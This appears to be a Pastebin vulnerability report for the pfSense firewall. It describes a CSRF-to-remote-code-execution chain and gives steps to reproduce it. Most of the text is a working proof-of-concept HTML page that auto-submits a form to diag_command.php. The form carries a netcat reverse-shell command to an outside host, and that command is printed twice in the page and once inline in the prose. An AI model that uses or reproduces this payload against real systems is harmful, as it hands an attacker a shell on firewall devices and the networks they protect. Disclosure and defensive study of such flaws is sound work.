Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- github repo :- https://github.com/pfsense/pfsense
- The pfsense firewall is vulnerable to RCE chained with CSRF as it uses
- `csrf magic` library since it allows to tamper the CSRF token values submited when processing the
- form requests. Due to this flaw, an attacker can exploit this vulnerability by crafting new page that
- contains attakcer's controlled input such as a "reverseshell" (eg: `rm /tmp/f;mkfifo /tmp/f;cat
- /tmp/f|/bin/sh -i 2>&1|nc attackerip port >/tmp/f`token value) in the form and entice the victims to click
- on the crafted link via social engineering methods. Once the victim clicks on the link (try again button
- in this case), attacker can take the lateral control of the victim's machine and malicious actions can be
- performed on victim's behalf.
- <!DOCTYPE html>
- <html>
- <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
- <form id="myForm" action="http://pfsense/diag_command.php" method="POST">
- <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
- <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
- <input type=hidden name="dlPath" value="">
- <input type=hidden name="txtPHPCommand" value="">
- <input type="hidden" name="submit" value="EXEC">
- </form>
- </body>
- </html>
- Steps to Reproduce :-
- Create a malicious page containing the below values and user will be redirected to
- https://pfsense/diag_command.php page.
- <!DOCTYPE html>
- <html>
- <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
- <form id="myForm" action="http://pfsense/diag_command.php" method="POST">
- <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
- <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
- <input type=hidden name="dlPath" value="">
- <input type=hidden name="txtPHPCommand" value="">
- <input type="hidden" name="submit" value="EXEC">
- </form>
- </body>
- </html>
- You will be greeted with the message as shown below.
- Once cliked on the Try again button you will be greeted with reverse shell of the victim.
Add Comment
Please, Sign In to add comment